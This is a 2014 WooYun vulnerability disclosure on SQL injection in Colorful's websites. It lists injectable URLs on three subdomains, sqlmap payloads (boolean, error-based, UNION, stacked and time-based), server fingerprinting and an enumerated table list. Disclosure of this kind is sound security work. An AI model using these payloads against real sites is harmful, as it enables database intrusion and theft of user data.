当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-059298

漏洞标题:七彩虹官网SQL注入漏洞

相关厂商:七彩虹

漏洞作者: 路人甲

提交时间:2014-05-03 20:52

修复时间:2014-06-17 20:52

公开时间:2014-06-17 20:52

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-05-03: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-06-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

SQL

详细说明:

-----------------------------------------------------------------------------
0@sec:漏洞存在于三个域名
www.colorful.cn
admin.colorful.cn
m.colorful.cn
-----------------------------------------------------------------------------
1@sec:MYSQL注入
-----------------------------------------------------------------------------
http://www.colorful.cn/ColorfulAwards.aspx?colorfulid=4&Time=2013 Time参数
http://www.colorful.cn/ColorfulNetwork_product.aspx?Cataid=12101509594818660dc6d78062fef4d73a8b
http://www.colorful.cn/JishuList.aspx?id=12101509594818660dc6d78062fef4d73a8b
http://www.colorful.cn/ColorfulNewDetails.aspx?id=1312c321776344fe4975917d082db085326b
http://www.colorful.cn/ColorfulProductdetails.aspx?id=130781bbf68a799442b6b7183b642caca75a id参数
-----------------------------------------------------------------------------
http://admin.colorful.cn/Common/ShowMobileImage.ashx?id=1404f2e9c238627c4b05a82aa0069108b6f0
http://admin.colorful.cn/Common/ShowImage.ashx?id=1307f25a656aa4ea45838d73e64b1ead6602
http://admin.colorful.cn/Common/ShowImage.ashx?id=13125b9f760c3a9742629e752fb4b9b2d46c&width=55&height=55 id=13125b9f760c3a9742629e752fb4b9b2d46c
-----------------------------------------------------------------------------
http://m.colorful.cn/NewDetails.aspx?id=1312c321776344fe4975917d082db085326b
http://m.colorful.cn/ColorfulAwards.aspx?colorfulid=4
http://m.colorful.cn/ColorfulAwards.aspx?Time=2013
http://m.colorful.cn/ProductDetails.aspx?id=13080918d7c248a04845925d64d040587611&CataId=1210091043471234035ab2610de009ec8235
http://m.colorful.cn/ProductDetails.aspx?id=668f8384-0685-4a70-895c-8f9eb39db020
-----------------------------------------------------------------------------

漏洞证明:

Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1312c321776344fe4975917d082db085326b' AND 2500=2500 AND 'uzXS'='uzXS
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=1312c321776344fe4975917d082db085326b'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=1312c321776344fe4975917d082db085326b' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
current user:    'ColorfulWebUser'


Place: GET
Parameter: Time
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: colorfulid=4&Time=2013' AND 8193=8193 AND 'lNpP'='lNpP
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: colorfulid=4&Time=2013' AND 3542=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(112)+CHAR(100)+CHAR(113)+(SELECT (CASE WHEN (3542=3542) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(100)+CHAR(112)+CHAR(112)+CHAR(113))) AND 'rmZW'='rmZW
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: colorfulid=4&Time=2013' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(98)+CHAR(112)+CHAR(100)+CHAR(113)+CHAR(83)+CHAR(83)+CHAR(119)+CHAR(100)+CHAR(98)+CHAR(120)+CHAR(116)+CHAR(99)+CHAR(104)+CHAR(112)+CHAR(113)+CHAR(100)+CHAR(112)+CHAR(112)+CHAR(113),NULL,NULL,NULL-- 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: colorfulid=4&Time=2013'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: colorfulid=4&Time=2013' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows Vista
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
current database:    'ColorfulWeb'


Database: ColorfulWeb
[49 tables]
+-----------------------------+
| B_ResouceInfo               |
| D99_Tmp                     |
| I_Credit                    |
| I_News                      |
| I_Recruit                   |
| I_SuccessfulCase            |
| I_SwitchImages              |
| I_SwitchSettings            |
| LeiFeng_Relation            |
| NPA_Parameters              |
| NPA_Product                 |
| P_DownloadFiles             |
| P_DownloadInfo              |
| P_DownloadType              |
| P_ProductBrand              |
| P_ProductCataLog            |
| P_ProductDownLoadRelation   |
| P_ProductImages             |
| P_ProductInfo               |
| P_ProductIntroduce          |
| P_ProductParameter          |
| P_ProductParameterVal       |
| P_ProductRoot               |
| P_ProductSeries             |
| P_ProductSeriesRelation     |
| P_ProductTechnical          |
| P_ProductTechnicalRelation  |
| R_GroupRight                |
| R_ModuleFunctions           |
| R_ModuleFunctions           |
| R_UserGroup                 |
| R_Users                     |
| SP_CellElements             |
| SP_ColorSeries              |
| SP_SpecialSubject2          |
| SP_SpecialSubject2          |
| SP_SubjectCells             |
| SP_SubjectMessage           |
| SP_Templet                  |
| SYS_LinkURL                 |
| SYS_Statistics              |
| SubjectMessage_View         |
| VW_LeiFengProductParameters |
| VW_ProductInfo              |
| VW_SP_SpecialSubject        |
| dtest                       |
| sysdiagrams                 |
| vwGetGroupRight             |
| vwGetNoneGroupRight         |
+-----------------------------+

修复方案:

id,Time等参数在进数据库查询之间先对参数进行过滤,或者白名单策略

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝